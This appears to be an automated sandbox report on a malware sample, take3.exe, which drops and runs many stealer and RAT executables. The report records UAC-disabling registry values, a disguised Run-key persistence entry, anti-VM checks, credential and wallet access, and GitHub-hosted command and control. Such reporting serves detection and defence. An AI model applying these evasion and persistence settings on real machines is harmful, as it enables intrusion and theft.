Malware Analysis Report

2025-01-23 12:19

Sample ID 241128-b8cczazmcy
Target take3.exe
SHA256 9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
Tags
ammyyadmin flawedammyy lokibot metasploit njrat xworm backdoor collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan upx pyinstaller
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview


Threat Level: Known bad

The file take3.exe was found to be: Known bad.

Malicious Activity Summary


FlawedAmmyy RAT

Ammyy Admin

MetaSploit

Ammyyadmin family

AmmyyAdmin payload

Lokibot

Flawedammyy family

Lokibot family

Metasploit family

Njrat family

Xworm family

Xworm

UAC bypass

njRAT/Bladabindi

Detect Xworm Payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Sets file to hidden

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Drops startup file

Reads data files stored by FTP clients

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Loads dropped DLL

Identifies Wine through registry keys

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Suspicious use of SetThreadContext

Drops file in Windows directory

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Detects Pyinstaller

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Access Token Manipulation: Create Process with Token

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

outlook_win_path

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

outlook_office_path

Modifies data under HKEY_USERS

Views/modifies file attributes

Delays execution with timeout.exe

Analysis: static1

Detonation Overview

Reported

2024-11-28 01:48

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 01:48

Reported

2024-11-28 01:49

Platform

win11-20241007-en

Max time kernel

48s

Max time network

76s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A (7 identical rows)

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\c1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A (26 identical rows)
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A (23 identical rows)

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (6 identical rows)

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772321430293249" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A (4 identical rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (2 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (6 identical rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (3 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (4 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (7 identical rows)
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A (2 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (3 identical rows)
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A (2 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (4 identical rows)
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A (2 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (5 identical rows)
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A (2 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (10 identical rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (7 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (26 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (16 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (22 identical rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (16 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (12 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A (14 identical rows)
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2500 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 4992 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4992 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4992 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4992 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4992 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4992 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
